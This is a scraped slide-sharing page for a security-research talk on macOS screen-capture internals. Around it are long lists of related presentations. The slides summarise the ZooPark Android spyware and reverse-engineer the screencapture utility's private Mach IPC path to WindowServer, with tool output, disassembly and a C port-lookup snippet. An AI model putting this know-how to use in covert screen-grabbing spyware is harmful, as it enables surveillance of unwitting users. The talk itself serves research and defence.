Encryption: It's For More Than Just PasswordsEncryption: It's For More Than Just Passwords
Encryption: It's For More Than Just Passwords
John Congdon
 
MongoDB 3.2 - Analytics
MongoDB 3.2 - AnalyticsMongoDB 3.2 - Analytics
MongoDB 3.2 - Analytics
Massimo Brignoli
 
GraphTalk Helsinki - Fraud Analysis with Neo4j
GraphTalk Helsinki - Fraud Analysis with Neo4jGraphTalk Helsinki - Fraud Analysis with Neo4j
GraphTalk Helsinki - Fraud Analysis with Neo4j
Neo4j
 
EWD 3 Training Course Part 21: Persistent JavaScript Objects
EWD 3 Training Course Part 21: Persistent JavaScript ObjectsEWD 3 Training Course Part 21: Persistent JavaScript Objects
EWD 3 Training Course Part 21: Persistent JavaScript Objects
Rob Tweed
 
GraphTalk Stockholm - Fraud Detection with Graphs
GraphTalk Stockholm - Fraud Detection with GraphsGraphTalk Stockholm - Fraud Detection with Graphs
GraphTalk Stockholm - Fraud Detection with Graphs
Neo4j
 
Operational Intelligence with MongoDB Webinar
Operational Intelligence with MongoDB WebinarOperational Intelligence with MongoDB Webinar
Operational Intelligence with MongoDB WebinarMongoDB
 
JWT - To authentication and beyond!
JWT - To authentication and beyond!JWT - To authentication and beyond!
JWT - To authentication and beyond!
Luís Cobucci
 
IOTA MAM介紹
IOTA MAM介紹IOTA MAM介紹
IOTA MAM介紹
Zeng Jun Wei
 
Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the code
Wim Godden
 
MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...
MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...
MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...
MongoDB
 
MongoDB Performance Tuning
MongoDB Performance TuningMongoDB Performance Tuning
MongoDB Performance Tuning
Puneet Behl
 
Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...
Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...
Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...MongoDB
 
Coding Horrors
Coding HorrorsCoding Horrors
Coding Horrors
Mark Baker
 
Geth important commands
Geth important commandsGeth important commands
Geth important commands
NexThoughts Technologies
 
MongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDB
MongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDBMongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDB
MongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDB
MongoDB
 
MongoDB Days Silicon Valley: MongoDB and the Hadoop Connector
MongoDB Days Silicon Valley: MongoDB and the Hadoop ConnectorMongoDB Days Silicon Valley: MongoDB and the Hadoop Connector
MongoDB Days Silicon Valley: MongoDB and the Hadoop Connector
MongoDB
 
Common Browser Hijacking Methods
Common Browser Hijacking MethodsCommon Browser Hijacking Methods
Common Browser Hijacking Methods
David Barroso
 
はじめてのMongoDB
はじめてのMongoDBはじめてのMongoDB
はじめてのMongoDB
Takahiro Inoue
 
Statisztikai Spamszurok 2008
Statisztikai Spamszurok 2008Statisztikai Spamszurok 2008
Statisztikai Spamszurok 2008
Janos Suto
 
MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...
MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...
MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...
MongoDB
 

What's hot (20)

Encryption: It's For More Than Just Passwords
Encryption: It's For More Than Just PasswordsEncryption: It's For More Than Just Passwords
Encryption: It's For More Than Just Passwords
 
MongoDB 3.2 - Analytics
MongoDB 3.2 - AnalyticsMongoDB 3.2 - Analytics
MongoDB 3.2 - Analytics
 
GraphTalk Helsinki - Fraud Analysis with Neo4j
GraphTalk Helsinki - Fraud Analysis with Neo4jGraphTalk Helsinki - Fraud Analysis with Neo4j
GraphTalk Helsinki - Fraud Analysis with Neo4j
 
EWD 3 Training Course Part 21: Persistent JavaScript Objects
EWD 3 Training Course Part 21: Persistent JavaScript ObjectsEWD 3 Training Course Part 21: Persistent JavaScript Objects
EWD 3 Training Course Part 21: Persistent JavaScript Objects
 
GraphTalk Stockholm - Fraud Detection with Graphs
GraphTalk Stockholm - Fraud Detection with GraphsGraphTalk Stockholm - Fraud Detection with Graphs
GraphTalk Stockholm - Fraud Detection with Graphs
 
Operational Intelligence with MongoDB Webinar
Operational Intelligence with MongoDB WebinarOperational Intelligence with MongoDB Webinar
Operational Intelligence with MongoDB Webinar
 
JWT - To authentication and beyond!
JWT - To authentication and beyond!JWT - To authentication and beyond!
JWT - To authentication and beyond!
 
IOTA MAM介紹
IOTA MAM介紹IOTA MAM介紹
IOTA MAM介紹
 
Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the code
 
MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...
MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...
MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...
 
MongoDB Performance Tuning
MongoDB Performance TuningMongoDB Performance Tuning
MongoDB Performance Tuning
 
Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...
Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...
Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...
 
Coding Horrors
Coding HorrorsCoding Horrors
Coding Horrors
 
Geth important commands
Geth important commandsGeth important commands
Geth important commands
 
MongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDB
MongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDBMongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDB
MongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDB
 
MongoDB Days Silicon Valley: MongoDB and the Hadoop Connector
MongoDB Days Silicon Valley: MongoDB and the Hadoop ConnectorMongoDB Days Silicon Valley: MongoDB and the Hadoop Connector
MongoDB Days Silicon Valley: MongoDB and the Hadoop Connector
 
Common Browser Hijacking Methods
Common Browser Hijacking MethodsCommon Browser Hijacking Methods
Common Browser Hijacking Methods
 
はじめてのMongoDB
はじめてのMongoDBはじめてのMongoDB
はじめてのMongoDB
 
Statisztikai Spamszurok 2008
Statisztikai Spamszurok 2008Statisztikai Spamszurok 2008
Statisztikai Spamszurok 2008
 
MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...
MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...
MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...
 

Similar to Who moved my pixels?!

MongoDB dla administratora
MongoDB dla administratora MongoDB dla administratora
MongoDB dla administratora
3camp
 
Mongo db dla administratora
Mongo db dla administratoraMongo db dla administratora
Mongo db dla administratora
Łukasz Jagiełło
 
20151224-games
20151224-games20151224-games
20151224-games
Noritada Shimizu
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Vincenzo Iozzo
 
Automated reduction of attack surface using call graph enumeration
Automated reduction of attack surface using call graph enumerationAutomated reduction of attack surface using call graph enumeration
Automated reduction of attack surface using call graph enumeration
Ruo Ando
 
426 lecture 4: AR Developer Tools
426 lecture 4: AR Developer Tools426 lecture 4: AR Developer Tools
426 lecture 4: AR Developer Tools
Mark Billinghurst
 
A 3D printing programming API
A 3D printing programming APIA 3D printing programming API
A 3D printing programming API
Max Kleiner
 
How Automated Vulnerability Analysis Discovered Hundreds of Android 0-days
How Automated Vulnerability Analysis Discovered Hundreds of Android 0-daysHow Automated Vulnerability Analysis Discovered Hundreds of Android 0-days
How Automated Vulnerability Analysis Discovered Hundreds of Android 0-days
Priyanka Aash
 
A miało być tak... bez wycieków
A miało być tak... bez wyciekówA miało być tak... bez wycieków
A miało być tak... bez wycieków
Konrad Kokosa
 
(120303) #fitalk ip finder and geo ip for fun
(120303) #fitalk ip finder and geo ip for fun(120303) #fitalk ip finder and geo ip for fun
(120303) #fitalk ip finder and geo ip for fun
INSIGHT FORENSIC
 
(120303) #fitalk ip finder and geo ip for fun
(120303) #fitalk ip finder and geo ip for fun(120303) #fitalk ip finder and geo ip for fun
(120303) #fitalk ip finder and geo ip for fun
INSIGHT FORENSIC
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS apps
Max Bazaliy
 
Android 4.2 Internals - Bluetooth and Network
Android 4.2 Internals - Bluetooth and NetworkAndroid 4.2 Internals - Bluetooth and Network
Android 4.2 Internals - Bluetooth and Network
Caio Pereira
 
Programar para GPUs
Programar para GPUsProgramar para GPUs
Programar para GPUs
Alcides Fonseca
 
Computer Networks Lab File
Computer Networks Lab FileComputer Networks Lab File
Computer Networks Lab File
Kandarp Tiwari
 
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP
 
Reutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiReutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiDefconRussia
 
Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the code
Wim Godden
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
GangSeok Lee
 

Similar to Who moved my pixels?! (20)

MongoDB dla administratora
MongoDB dla administratora MongoDB dla administratora
MongoDB dla administratora
 
Mongo db dla administratora
Mongo db dla administratoraMongo db dla administratora
Mongo db dla administratora
 
20151224-games
20151224-games20151224-games
20151224-games
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
Automated reduction of attack surface using call graph enumeration
Automated reduction of attack surface using call graph enumerationAutomated reduction of attack surface using call graph enumeration
Automated reduction of attack surface using call graph enumeration
 
426 lecture 4: AR Developer Tools
426 lecture 4: AR Developer Tools426 lecture 4: AR Developer Tools
426 lecture 4: AR Developer Tools
 
A 3D printing programming API
A 3D printing programming APIA 3D printing programming API
A 3D printing programming API
 
How Automated Vulnerability Analysis Discovered Hundreds of Android 0-days
How Automated Vulnerability Analysis Discovered Hundreds of Android 0-daysHow Automated Vulnerability Analysis Discovered Hundreds of Android 0-days
How Automated Vulnerability Analysis Discovered Hundreds of Android 0-days
 
A miało być tak... bez wycieków
A miało być tak... bez wyciekówA miało być tak... bez wycieków
A miało być tak... bez wycieków
 
(120303) #fitalk ip finder and geo ip for fun
(120303) #fitalk ip finder and geo ip for fun(120303) #fitalk ip finder and geo ip for fun
(120303) #fitalk ip finder and geo ip for fun
 
(120303) #fitalk ip finder and geo ip for fun
(120303) #fitalk ip finder and geo ip for fun(120303) #fitalk ip finder and geo ip for fun
(120303) #fitalk ip finder and geo ip for fun
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS apps
 
Android 4.2 Internals - Bluetooth and Network
Android 4.2 Internals - Bluetooth and NetworkAndroid 4.2 Internals - Bluetooth and Network
Android 4.2 Internals - Bluetooth and Network
 
Programar para GPUs
Programar para GPUsProgramar para GPUs
Programar para GPUs
 
Computer Networks Lab File
Computer Networks Lab FileComputer Networks Lab File
Computer Networks Lab File
 
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
 
Reutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiReutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take ii
 
Random numbers
Random numbersRandom numbers
Random numbers
 
Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the code
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
 

More from Mikhail Sosonkin

ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanning
Mikhail Sosonkin
 
Sniffing Mach Messages
Sniffing Mach MessagesSniffing Mach Messages
Sniffing Mach Messages
Mikhail Sosonkin
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
Mikhail Sosonkin
 
Owasp orlando, april 13, 2016
Owasp orlando, april 13, 2016Owasp orlando, april 13, 2016
Owasp orlando, april 13, 2016
Mikhail Sosonkin
 
OWASP: iOS Spelunking
OWASP: iOS SpelunkingOWASP: iOS Spelunking
OWASP: iOS Spelunking
Mikhail Sosonkin
 
NYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABINYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABI
Mikhail Sosonkin
 

More from Mikhail Sosonkin (6)

ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanning
 
Sniffing Mach Messages
Sniffing Mach MessagesSniffing Mach Messages
Sniffing Mach Messages
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
Owasp orlando, april 13, 2016
Owasp orlando, april 13, 2016Owasp orlando, april 13, 2016
Owasp orlando, april 13, 2016
 
OWASP: iOS Spelunking
OWASP: iOS SpelunkingOWASP: iOS Spelunking
OWASP: iOS Spelunking
 
NYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABINYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABI
 

Recently uploaded

Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
Tendenci - The Open Source AMS (Association Management Software)
 
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoamOpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
takuyayamamoto1800
 
Into the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdfInto the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdf
Ortus Solutions, Corp
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
AMB-Review
 
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
XfilesPro
 
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Shahin Sheidaei
 
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus
 
First Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User EndpointsFirst Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User Endpoints
Globus
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
XfilesPro
 
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Anthony Dahanne
 
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Globus
 
top nidhi software solution freedownload
top nidhi software solution freedownloadtop nidhi software solution freedownload
top nidhi software solution freedownload
vrstrong314
 
Using IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New ZealandUsing IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New Zealand
IES VE
 
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Globus
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
Matt Welsh
 
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.ILBeyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Natan Silnitsky
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Globus
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
Juraj Vysvader
 
Understanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSageUnderstanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSage
Globus
 
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
informapgpstrackings
 

Recently uploaded (20)

Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
 
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoamOpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoam
 
Into the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdfInto the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdf
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
 
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
 
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
 
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024
 
First Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User EndpointsFirst Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User Endpoints
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
 
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
 
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
 
top nidhi software solution freedownload
top nidhi software solution freedownloadtop nidhi software solution freedownload
top nidhi software solution freedownload
 
Using IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New ZealandUsing IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New Zealand
 
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
 
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.ILBeyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
 
Understanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSageUnderstanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSage
 
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
 

Who moved my pixels?!

  • 3. “Synack leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints”
  • 4. ● Pranking ● Hacktivism ● Ransom ● Compute theft ● Espionage ● Financial theft ● For educational purposes! Why malware? Motives and intent
  • 6. ● Reported by Kaspersky in May 2018 ● Android based malware ● Targeted middle eastern phones ● Focuses on information theft ○ Exfiltration via HTTP GET request parameters ● Distributed via Watering Holes ○ Alnaharegypt[.]com - with an iframe to malicious APK. ZooPark the inspiration
  • 7. ● Version 1 ○ Contacts/Accounts ● Version 2 ○ Call logs/GPS Location ○ SMS Messages/Device Information ● Version 3 ○ Audio Call Records ○ Installed Application Details ○ Browser Data - bookmarks & History ○ Photos & Pictures from memory card ● Version 4 (suspected to be outsourced) ○ Keylogs/Clip data ○ Arbitrary file/folders ○ Capturing photos/videos/audio/ screenshots/screen records ○ External Application data (Telegram, WhatsApp, IMO, Chrome) ○ Remote Shell/Silently Sending SMS/Making phone calls ZooPark features F536BC5B79C16E9A84546C2049E810E1 Android screencapture malware in not unique! (July 2017)
  • 8. How do you capture screens? on OS X
  • 9. $ otool -L /usr/sbin/screencapture /usr/sbin/screencapture: /System/Library/PrivateFrameworks/SkyLight.framework/Versions/A/SkyLight /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics Which screencapture an overview The "bin" version contains general-use programs, while the "sbin" version contains programs that're generally only used for system administration. http://www.westwind.com/reference/OS-X/invisibles.html $ codesign -d --entitlements - `which screencapture` Executable=/usr/sbin/screencapture Libraries with the relevant functions: _CGDisplayCreateImage (CoreGraphics) -> _SLSHWCaptureDesktop (SkyLight) Maps to _XHWCaptureDesktop in server-side SkyLight Shared with WindowServer! No Special entitlements!
  • 10. Mach based IPC mig Mach 3 Server Writer’s Guide: http://shakthimaan.com/downloads/hurd/server_writer.pdf $ jtool -arch x86_64 -q -d __DATA.__const /System/Library/PrivateFrameworks/SkyLight.framework/SkyLight | grep "MIG sub" Dumping from address 0x29fda0 (Segment: __DATA.__const) to end of section Address : 0x29fda0 = Offset 0x2a0da0 0x2a0608: 68 74 00 00 a9 74 00 00 MIG subsystem 29800 (65 messages) 0x2a10c0: 48 71 00 00 57 71 00 00 MIG subsystem 29000 (15 messages) 0x2a13a8: 10 72 00 00 0b 74 00 00 MIG subsystem 29200 (507 messages) $ jtool -arch x86_64 -q -d __DATA.__const /System/Library/PrivateFrameworks/SkyLight.framework/SkyLight | grep 29482 Dumping from address 0x29fda0 (Segment: __DATA.__const) to end of section Address : 0x29fda0 = Offset 0x2a0da0 0x2a3fd8: c4 36 04 00 00 00 00 00 __XHWCaptureDesktop (MIG_Msg_29482_handler)
  • 11. Highlevel the utility WindowServerLaunchd Bootstrap lookup: com.apple.windowserver.active Windowserver port 5 shutter sound Hey there on port 5 Hey, talk on port 6 Give me all pixels Sure, find at memory 0xF mach_vm_map 0xF Zzzz Output to file descriptor Shared object This is fine More details: http://debugtrap.com/2018/04/01/screencapure/
  • 12. Into the bytes 1) Find ports __text:34A6 _CGSLookupServerRootPort proc near ; CODE XREF: _get_session_port+1Fp ; _CGSLookupServerPort+A5p ... __text:34A6 lookup_result = dword ptr -38h __text:34A6 special_port = dword ptr -34h ... __text:34C8 lea rdx, [rbp+special_port] ; special_port __text:34CC mov dword ptr [rdx], 0 __text:34D2 mov r13, cs:_mach_task_self__ptr __text:34D9 mov edi, [r13+0] ; task __text:34DD mov esi, 4 ; which_port __text:34E2 call _task_get_special_port __text:34E7 mov ebx, eax __text:34E9 test ebx, ebx __text:34EB jnz loc_35ED __text:34F1 mov edi, [rbp+special_port] __text:34F4 test edi, edi __text:34F6 jz loc_35ED __text:34FC lea rdx, [rbp+lookup_result] __text:3500 mov dword ptr [rdx], 0 __text:3506 lea r14, aCom_apple_w_21 ; "com.apple.windowserver.active" __text:350D xor ecx, ecx __text:350F mov r8d, 8 __text:3515 mov rsi, r14 __text:3518 call _bootstrap_look_up2 mach_port_t self = mach_task_self(); task_get_bootstrap_port(self, &bs_port); // find the server port if(bootstrap_look_up(bs_port, "com.apple.windowserver.active", &serv_port) == KERN_SUCCESS) { printf("Server port: 0x%08Xn", serv_port); } else { printf("Error looking up server" " portn"); exit(2); }
